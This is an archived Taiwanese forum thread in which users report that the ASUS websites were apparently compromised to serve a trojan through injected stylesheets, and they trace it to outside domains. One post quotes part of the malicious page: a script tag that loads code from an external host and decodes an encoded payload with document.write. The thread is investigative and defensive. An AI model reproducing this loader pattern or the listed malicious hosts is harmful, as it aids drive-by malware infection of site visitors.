![]() |
PCDVD數位科技討論區
(https://www.pcdvd.com.tw/index.php)
- 系統組件
(https://www.pcdvd.com.tw/forumdisplay.php?f=19)
- - ASUS網站被加料了?
(https://www.pcdvd.com.tw/showthread.php?t=679020)
|
---|
昨天晚上看已經沒了,今天剛剛連上發現又出現了。
那個木馬網址藏身於此 http://tw.asus.com/include/style.css jp和global的也有,木馬網址不一樣,但是內容一樣 http://jp.asus.com/include/style.css http://www.asus.com/include/style.css |
不要用IE不就沒事了...
|
引用:
看檔名....八成也是偷遊戲天堂帳號密碼的 |
用Maxthon 攔截到要安裝某物件的訊息 !
當然是選擇拒絕 ! |
現在ASUS 網站已經修復了
可以安心連結了 ! 看來應該是ASUS 網站被入侵。 |
IE7玩玩就算了 ....
回頭支持 FF2.0 |
引用:
突然想到有沒有離職員工挾怨報復的可能性 |
引用:
通常這隻木馬都是中國駭客所為,目的在盜取天堂1/2遊戲帳號。 離職員工除非找到安全的銷贓管道,要不然很容易被抓。 |
上了ASUS網站,重新整理一下,
雖然不會連上 http://www.hiet.tw/1.htm 但還是可在IE狀況列看到出現一下 而這個 hiet.tw的網域, 在 http://rs.twnic.net/ 查是這個人的 但資料也不夠,也沒有電話,真是奇怪! Domain Name: hiet.tw Contact: liting [email protected] Record expires on 2007-10-20 (YYYY-MM-DD) Record created on 2006-10-20 (YYYY-MM-DD) Registrar: SEEDNET |
後來再到 http://www.hiet.tw/1.htm 看了一下,一個空白的網頁, 裡面有個java的連結
<SCRIPT LANGUAGE="JavaScript" src="http://www.plmq.com/script/src/code.js"></script><SCRIPT LANGUAGE="JavaScript"> var v = "原本是一大串編碼,省略jbElEMSAgPSAiY2xzaSINCiAgICBjbElEMiAgPSAi"; document.write(aa(v,100));</SCRIPT> 而這個就是那個Java了! http://www.plmq.com/script/src/code.js 可以用文字檔的方式打開看看裡面的程式是什麼。 |
所有的時間均為GMT +8。 現在的時間是11:57 PM. |
vBulletin Version 3.0.1
powered_by_vbulletin 2025。